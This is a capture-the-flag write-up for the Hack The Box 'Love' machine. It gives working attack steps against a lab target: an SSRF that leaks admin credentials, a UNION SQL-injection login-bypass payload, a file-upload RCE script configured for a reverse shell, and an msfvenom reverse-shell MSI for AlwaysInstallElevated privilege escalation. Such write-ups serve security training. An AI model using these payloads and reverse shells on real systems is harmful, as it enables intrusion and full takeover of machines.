Contents

🕵 HTB-Writeup : LOVE

Recon

rustscan x nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
└─$ rustscan -b 10000 -a 10.10.10.239 -- -T5 -A -sV -Pn 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.

PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp   open  microsoft-ds syn-ack Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?       syn-ack
|_    Host '10.10.16.11' is not allowed to connect to this MariaDB server
| mysql-info: 
|_  MySQL Error: Host '10.10.16.11' is not allowed to connect to this MariaDB server
5000/tcp  open  http         syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown      syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?   syn-ack
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49668/tcp open  msrpc        syn-ack Microsoft Windows RPC
49669/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
Host script results:
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-09-05T13:06:02-07:00

The nmap scan provide us some informations about the machine. It is a Windows 10 Pro station.

We discover a MySQL server running on port 5000 but we don’t have an access to it. It is IP filtered.

1
2
└─$ mysql --host=10.10.10.239                              
ERROR 1130 (HY000): Host '10.10.16.11' is not allowed to connect to this MariaDB server

We got a http server on port 80 and several other ports. We can see on the http-title get from the scan that the website use a Voting System.

Browsing to http://10.10.10.239/index.php, we are face to a login form.

drawing

Index page with the login form

dirbuster

Using dirbuster we discover some directory and an interesting admin login page at http://10.10.10.239/admin/index.php.

Vulnerabilities

searchsploit

Running searchsploit we found multiple vulnerabilities on the Voting System.

1
2
3
4
5
6
7
8
9
└─$ searchsploit voting system                             
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Voting System 1.0 - Authentication Bypass (SQLI)                                   | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)          | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                        | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)                | php/webapps/49817.txt
----------------------------------------------------------------------------------- ---------------------------------

First, we will focus on the Authentication Bypass (SQLI). To try to bypass the login form on the admin page.

Exploiting Voting System

First solution - SSRF

On the nmap scan we discover a certificate on port 443.

We can extract from it two domains:

  • love.htb
  • staging.love.htb
drawing

Subject name of the certificate containing 2 domains

1
2
# put both domain on /etc/hosts
echo "10.10.10.239 love.htb staging.love.htb" > /etc/hosts

Browsing on http://staging.love.htb we are face to a file scanner service. We found a demo page where we can provide url that point to file.

drawing

URL File scanner

Do you remember the MySQL filtered service ? Maybe we can get some information from that service.

drawing

Exploiting SSRF on the scanner service

We get our creds admin:@LoveIsInTheAir!!!! !

Second solution - SQL injection

This exploit use an Union Base SQLi to bypass authentication.

We need to provide a bcrypt hash and a non-existing user

1
login=&password=admin&username=coucou' UNION SELECT 1,2,"$2y$10$913MFiqWEjfzJ0fZc74hQeRdPGOdggX7KFbd23rfPyf5zmnISBC3a",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -

With burp, I craft this payload and I try the SQLi:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
POST /admin/login.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 194
Cache-Control: max-age=
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.239
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sv9dcm0k1bv1gl1q2nhq5db1e0
Connection: close

username=coucou%27+UNION+SELECT+1%2C2%2C%22%242y%2412%24jRwyQyXnktvFrlryHNEhXOeKQYX7%2F5VK2ZdfB9f%2FGcJLuPahJWZ9K%22%2C4%2C5%2C6%2C7+from+INFORMATION_SCHEMA.SCHEMATA%3B--+-&password=admin&login=

It works! We are now connected to the Dashboard as Neovic Devierte (admin).

drawing

Voting System Dahsboard

Get our first shell

Now that we are connected we can use the File Upload RCE (Authenticated Remote Code Execution) exploit found with searchsploit.

The exploit is a python script. This one will upload a php script throught the profile photo upload feature. Our script will spawn a reverse shell.

We edit the script to fit our needs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" # Auth User
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.11" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

After opening a listener with nc I execute the exploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54012
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>type C:\Users\Phoebe\Desktop\user.txt
*************************7feb616

We get a shell! We are now connected as love\phoebe, we can get the user flag.

Path to the privesc

Local recon

Search for any used ports, tasks or privileges.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# show used ports
C:\xampp\htdocs\omrs\images> netstat -ano | findstr TCP
# search for tasks
C:\xampp\htdocs\omrs\images> tasklist /v 
# show privileges
C:\xampp\htdocs\omrs\images>whoami /all

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

But I don’t find any interesting informations.

WinPeas

I launch a WinPeas scan and I found that the AlwaysInstallElevated privilege is enabled. It means that we are able to install & execute MSI package.

1
2
3
4
---------- Checking AlwaysInstallElevated
-  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

Abusing privileges

It is possible to craft our MSI Package from msfvenom. Then, we upload the package on the target. Finally, we install & execute the package with the msiexec command.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.16.11 lport=4445 -f msi > exploit.msi

# upload the MSI package on C:\Windows\Temp dir
C:\xampp\htdocs\omrs\images>msiexec /quiet /qn /i C:\Windows\Temp\exploit.msi

└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54112
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************43d68b

We are now system owner ! We can get the flag :)

Tags

Easy, Internal, Apache, Penetration Tester Level 1, SSRF Exploitation, A05:2021-Security Misconfiguration, Public Vulnerabilities, MySQL, Unrestricted File Upload, Windows Vulnerabilities, Remote Code Execution, Confidentiality, Code Execution, Defense Mechanisms